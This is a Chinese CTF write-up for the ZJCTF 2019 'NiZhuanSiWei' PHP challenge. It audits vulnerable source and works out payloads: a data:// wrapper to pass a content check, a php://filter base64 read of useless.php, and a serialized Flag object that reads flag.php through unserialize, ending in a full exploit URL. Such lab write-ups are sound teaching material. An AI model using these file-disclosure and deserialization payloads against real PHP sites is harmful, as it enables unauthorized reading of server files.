[PHP知识库] [ZJCTF 2019]NiZhuanSiWei

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> [ZJCTF 2019]NiZhuanSiWei -> 正文阅读

[PHP知识库][ZJCTF 2019]NiZhuanSiWei

1、代码审计
在这里插入图片描述 2、简化源码

get 传参 text file password
if((file_get_contents($text,'r')==="welcome to the zjctf")){
    if(preg_match("/flag/",$file)){
    }
    else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}

3、分析
我们必须在服务器中找到一个内容为welcome to the zjctf的文件x，让text=x，但是这大概率找不到。只能绕过了。

①、

在这里插入图片描述

②、

在这里插入图片描述 4、继续分析
useless.php 不回显，那就用伪协议输出。
file=php://filter/read=convert.base64-encode/resource=useless.php
5、base64解码得到

<?php  
class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

6、PHP序列化 - 在线代码运行

<?php  
class Flag{
    public $file="flag.php";  
}  
$a=new Flag();
echo serialize($a);
?> 

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

7、最终的payload
/?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
file必须为useless.php，这样才会被include进主页面。不然反序列化的Flag类就无法找到。
在这里插入图片描述